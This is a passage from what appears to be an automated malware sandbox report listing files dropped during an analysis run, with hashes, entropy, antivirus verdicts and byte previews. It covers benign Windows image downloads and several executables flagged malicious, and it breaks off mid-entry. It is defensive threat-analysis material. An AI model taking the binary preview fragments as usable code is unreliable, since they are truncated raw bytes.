                                                                                                                        Preview: ......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 21.1 (Windows).2020:08:25 09:18:51.........................................8..............................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....`....W.0....r..:...Z~.Pd.k5..Sk..X..x..`u..<)..q...7...G...g....4..x.T.G.0...z.l.o*....."6.+A.m..Ef.=.&L..v.7..G..jU....jzurt..P.l..5Z.G..G..i;..o..
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\d9ba0342-18ab-4279-adeb-d351ea245ae5.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 21.1 (Windows), datetime=2021:11:11 06:55:38]
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1654488
                                                                                                                        Entropy (8bit):6.926504673655095
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:1k44jNiVr4qVhre8lekiZaSEKBcf/prV/RRJGoGaEqKEHisGpp7quKRDR7ripxi6:H4jNiVr4qXlZvKV9pp7qPRDNripY6
                                                                                                                        MD5:3C36C820F3E016E8A3A63C34BA7BEF07
                                                                                                                        SHA1:AF2A7EBB7A6D6C1815190C24EF732B2089115331
                                                                                                                        SHA-256:F62AFA107BBFE2FEAEF84AB87277D31DFE1AAABF61400F241FDD50C45AB19D7F
                                                                                                                        SHA-512:1074A8603B932052ED17825E83403D5F4EC3CD8CC7DB94BC4F262146DDA054640CBFB126FD728AB35C8B2B20285BC71CFE20BB3DEB3BDF8CC4B2877595B94C86
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 21.1 (Windows).2021:11:11 06:55:38.............................8..........................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................Z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..(..].1.............}S.... ..4mp#...w..[..`.[.P.=...g.w.U{........{..?..<..I..`..:._..d.T.k.q.m....;..1..........@..A1..5w.kZCk...*`....~.*...$9.{..
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\d9ba0342-18ab-4279-adeb-d351ea245ae5.eb16e995-ca84-40f4-ab30-b44222e03118.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5947028556775
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiqThWzgx71+0RWElsafc+Oc2CpXpjjX+vUViWBKsDhX3KsDmbpkwU:LLD2mRiGCgvHMElrfeIXpjjX+v8iWBKo
                                                                                                                        MD5:FD409FA92FBEA2FD7073CDD1A343D129
                                                                                                                        SHA1:176E1C047344F309731B6E3733624C09ED0E392D
                                                                                                                        SHA-256:844648EF68EFF5EE414A1C551D9262412CBA813B75D17559FE886C480A548ECA
                                                                                                                        SHA-512:57FDBABD69D84D9379D59824B3BDB65C9871B6176B8F4E83E7EA96D4BE38EEAAEDB03EFE97DDC6B0FA3C89866D345362DAA94C394DF05E896AFFA0DB03E7A7EF
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.0.U.C.?.v.e.r.=.2.f.4.4...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .1.0.:.0.4.:.1.6. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .1.8.a.0.a.0.2.3.-.f.c.b.3.-.4.c.6.1.-.8.d.f.7.-.7.f.0.8.a.a.4.1.e.3.7.2...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.0.U.C.?.v.e.r.=.2.f.4.4...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.6.5.4.4.8.8...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.6.5.4.4.8.8...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\e0fc5cf9-8432-419c-98fa-5245d76af360.a214058d-4932-49cc-ab40-d730f65403f6.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.605918884002608
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiw0oUWzgx71++Bisafc+Oc2CpXpjjX+vUViwzB+vFX3+vqbbL0D:LLD2mRiabgvJirfeIXpjjX+v8iqBCX3S
                                                                                                                        MD5:195D829E09800C81AE13EBEF1D5FCB05
                                                                                                                        SHA1:DDBC8B89C88BA51ABCB9C3E91E08EE956C2E40B8
                                                                                                                        SHA-256:AF908F5DE5D73626FEF4AEACE77887D9025A763E2B99B3AEBF05F56CDF5304C7
                                                                                                                        SHA-512:5C62BB28712F1BCA6AF00515DBB3BEB0081F52987C03F622CCC44595C30A5CE8BC935A398D0C2DFA8A9694F4C55BC5E07818CB1F9581EC020DC4BDD3357B3433
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.V.B.5.?.v.e.r.=.d.d.3.a...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.u.e.,. .1.1. .J.a.n. .2.0.2.2. .2.0.:.5.2.:.0.7. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .7.6.2.f.8.9.7.1.-.d.6.d.b.-.4.c.6.4.-.8.0.6.5.-.9.d.4.f.0.2.b.9.8.6.7.b...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.C.V.B.5.?.v.e.r.=.d.d.3.a...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .7.5.5.4.3.1...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .7.5.5.4.3.1...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\e0fc5cf9-8432-419c-98fa-5245d76af360.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1920x1080, frames 3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):755431
                                                                                                                        Entropy (8bit):7.889494455004551
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:skGgYlPnhhvcDi/Pg5Bn3Vv0eucNiMc+cQpawhhIfB7iTzWqovkjset8scoXmizl:skGgC6iAnFvw6iMA+hIp7Ado8tpv
                                                                                                                        MD5:FFE1E08E186355FBDAA8C57461BAA6DA
                                                                                                                        SHA1:3FBA91092AE606FEB46FE84225C4016CEB5E0872
                                                                                                                        SHA-256:D62A3279E0AD100138EF5A397B53029AF95E42BE9BF9FEC30D9A7A246DC75111
                                                                                                                        SHA-512:DB703B8C3F3E3AE8B340F415291FF7C8A22CFFD72F23642C3F2EB115B6CF14EB3C398C0E5E13DFB421A0FCA697A7CE0A56C7CC45C1DE22F032FD332BDD03F8C8
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ......JFIF.....`.`.....C....................................................................C.......................................................................8...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....R9.E$.,.Y...z..{..'.....V...Yj.....m....w...[z}......K....n..'..._.IV....9..C..<3d..V..m..ZnV..-.w...v?...}.....u.$..r....{j..==k....]b.sE..o..#8..v..s+Tg-z-J.C.}hC..........m..bk.....OE..Z.......z....Q..K.(..>e...kb..5]>8:.V+...Oc]S.......cZ.j.v...O3G=..w,..v.n8.\....%......k..z....d.my%.r.o,....I...5[.]X.k.....8..7.......!.U...W.PV.N.K..>...k{.m..
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\ee43e9f0-56a7-4da5-a52e-7978cee7ce3e.eb16e995-ca84-40f4-ab30-b44222e03118.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.5947028556775
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiqThWzgx71+0RWElsafc+Oc2CpXpjjX+vUViWBKsDhX3KsDmbpkwU:LLD2mRiGCgvHMElrfeIXpjjX+v8iWBKo
                                                                                                                        MD5:FD409FA92FBEA2FD7073CDD1A343D129
                                                                                                                        SHA1:176E1C047344F309731B6E3733624C09ED0E392D
                                                                                                                        SHA-256:844648EF68EFF5EE414A1C551D9262412CBA813B75D17559FE886C480A548ECA
                                                                                                                        SHA-512:57FDBABD69D84D9379D59824B3BDB65C9871B6176B8F4E83E7EA96D4BE38EEAAEDB03EFE97DDC6B0FA3C89866D345362DAA94C394DF05E896AFFA0DB03E7A7EF
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.0.U.C.?.v.e.r.=.2.f.4.4...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .1.0.:.0.4.:.1.6. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .1.8.a.0.a.0.2.3.-.f.c.b.3.-.4.c.6.1.-.8.d.f.7.-.7.f.0.8.a.a.4.1.e.3.7.2...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.0.U.C.?.v.e.r.=.2.f.4.4...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.6.5.4.4.8.8...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.6.5.4.4.8.8...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\ee43e9f0-56a7-4da5-a52e-7978cee7ce3e.up_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):276
                                                                                                                        Entropy (8bit):3.411328286431714
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQi9PzM:ZxMghwLtHSM1Sb9mSMXAv
                                                                                                                        MD5:F89B0A182CEC59870B296ADB7C2FC692
                                                                                                                        SHA1:C9301A976859229017D581106CABF70BE78E9726
                                                                                                                        SHA-256:03C5CB5701A4D9E152464A849CA4573C9009C7D6F878E6456A482756210FC37B
                                                                                                                        SHA-512:D4923FA307B710FC1B87B47A40394ECB85084F0E064D296BCE477EEA9EA36A8918103498D7FAC813F8C8554330CCBB09E856CEFB830E6449787F8260D4A26F2B
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.0.U.C.?.v.e.r.=.2.f.4.4...........
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f3c574c2-74c3-4fcb-a00b-1b0c64e37f0d.701c9b8b-e624-449d-a7f7-5920d87b9fa6.down_meta
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1228
                                                                                                                        Entropy (8bit):3.596377708245441
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:LLVR2mRiJTyWzgx71+XxPWJsafc+Oc2CpXpjjX+vUVi9BKkX3KPbDkwU:LLD2mRiNZgvIOJrfeIXpjjX+v8i9BKkX
                                                                                                                        MD5:0FE0FF6CA45026CD1EBF503AC1ACEBFB
                                                                                                                        SHA1:EF50B263F19557055B5532596B2D25AD258675A9
                                                                                                                        SHA-256:EBAA06E959ED054EC3F00769234D5D05D09996EF388448147655EEBA2488483F
                                                                                                                        SHA-512:4FA7BF1964C753E5E21CB8610186FDA56210CE8F83733389FC2E8133D2AE694E97BE508026437168EE5480E38EC1A293AB82B5A62D2FD22E192C2EB5F3C1E05E
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.k.k.?.v.e.r.=.8.c.6.2...L.a.s.t.-.M.o.d.i.f.i.e.d.:. .T.h.u.,. .1.3. .J.a.n. .2.0.2.2. .1.7.:.1.1.:.1.0. .G.M.T...A.c.c.e.s.s.-.C.o.n.t.r.o.l.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.D.a.t.a.c.e.n.t.e.r.:. .n.o.r.t.h.e.u...X.-.A.c.t.i.v.i.t.y.I.d.:. .4.e.0.a.9.3.4.6.-.0.9.9.0.-.4.3.c.9.-.8.3.2.3.-.2.1.8.3.5.2.0.d.5.6.b.3...T.i.m.i.n.g.-.A.l.l.o.w.-.O.r.i.g.i.n.:. .*...X.-.F.r.a.m.e.-.O.p.t.i.o.n.s.:. .d.e.n.y...X.-.R.e.s.i.z.e.r.V.e.r.s.i.o.n.:. .1...0...C.o.n.t.e.n.t.-.T.y.p.e.:. .i.m.a.g.e./.j.p.e.g...C.o.n.t.e.n.t.-.L.o.c.a.t.i.o.n.:. .h.t.t.p.s.:././.i.m.a.g.e...p.r.o.d...c.m.s...r.t...m.i.c.r.o.s.o.f.t...c.o.m./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.P.8.k.k.?.v.e.r.=.8.c.6.2...X.-.S.o.u.r.c.e.-.L.e.n.g.t.h.:. .1.8.2.9.9.9.4...C.o.n.t.e.n.t.-.L.e.n.g.t.h.:. .1.8.2.9.9.9.4...C.a.c.h.e.-.C.o.n.t.r.o.l.:. .p.u.b.
                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f3c574c2-74c3-4fcb-a00b-1b0c64e37f0d.down_data
                                                                                                                        Process:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 21.1 (Windows), datetime=2021:11:11 06:54:34]
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1829994
                                                                                                                        Entropy (8bit):7.092403290156545
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:LdC81bzA4GeD+kaZRfEyfcA/ir2/R0JGSUmfyttS6dSTeuErzQP/Lg40bw2Rf02b:LdC81bz/Dq39STvErQ/05d0k
                                                                                                                        MD5:4FB1CD4A9C7B4165BF8CD730F367600C
                                                                                                                        SHA1:1FD8481802A3512CC65105B600C9339784A31E10
                                                                                                                        SHA-256:E60B827FEE4A3A7FF6033C3F244AE04D5A51D7E581936BE750F2EABE4F72E2A0
                                                                                                                        SHA-512:C3D101D94A75EFE81C7E8AB1F45654271A67048A6439C2C202589038519D24B62A98F77EA267AE320ED2FC9AFBB7D6C4AE4B079C19AA05E4F7D7BA7A87C79E61
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 21.1 (Windows).2021:11:11 06:54:34.........................................8..............................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...n.fx..w.V..^N[..k .u....T.y._M.=..$..k.G..gV...i..4..j.)..k..a~.~.K.2....:..-wc..[....(....X....&y.<...pu..C@..>.J......k.8..........@..xdx...:.V..X
                                                                                                                        C:\Users\user\AppData\Local\Temp\13C.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):7336391
                                                                                                                        Entropy (8bit):7.993025428513385
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:196608:76+hvICteEroXxqENE+sKsXXgvkz+AlnhMCRKsAN2aL:DInEroXjsKkXgsCMhkrNF
                                                                                                                        MD5:CBE604877A46CEEBA112802BC17FFEF8
                                                                                                                        SHA1:E85AB4CCBE491348C39F751162FFF71A90643ECA
                                                                                                                        SHA-256:32703A3D88B3E9B8FE1A64FD1CBCC0925FC2C74BCBDEFBBD6944CBFAD0029FEC
                                                                                                                        SHA-512:86F3946B813FB457D95B6635FA308DA1BF5F2C0FBD5BDCA75F7776D1A01A2D3C67A8A9E268DCC145FF575D70FBE84BE9BEB112A0D2269B955795C74468C00598
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d...Q..a.........."......6...T................@......................................p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\1523.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3576320
                                                                                                                        Entropy (8bit):7.9976863291960605
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                                                        MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                                                        SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                                                        SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                                                        SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\2205.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):905216
                                                                                                                        Entropy (8bit):7.399713113456654
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                        MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                        SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                        SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                        SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\2D8F.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:MS-DOS executable
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):557664
                                                                                                                        Entropy (8bit):7.687250283474463
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                                        MD5:6ADB5470086099B9169109333FADAB86
                                                                                                                        SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                                        SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                                        SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                                        C:\Users\user\AppData\Local\Temp\4955.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):7336385
                                                                                                                        Entropy (8bit):7.993036026488077
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:196608:l++hvICteEroXxqENE+sKsXXgvkwuUxNhMC/CKN7kL:BInEroXjsKkXgs/EhWKNY
                                                                                                                        MD5:AE6510D9815C44A818F722ECAE6844B8
                                                                                                                        SHA1:2A34B5110F5C3C2424AE9685F57261E2546BD963
                                                                                                                        SHA-256:C3CAD582268B165711E2F2B1834891C7BCB5E57A7EFB1E709E3DF19D011AD656
                                                                                                                        SHA-512:8CAA9E661403D5D86F69E7C35E45CDF927EF9EC0C6045ED2CA5AF2EAAF26B4F99291EADAF2F0C8C00A31B05B228C6DF0C4BD205A7B3EC70E263313A08FFEF4F8
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d.....a.........."......6...T................@....................................%.p...`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\54D0.exe
                                                                                                                        Process:C:\Windows\explorer.exe
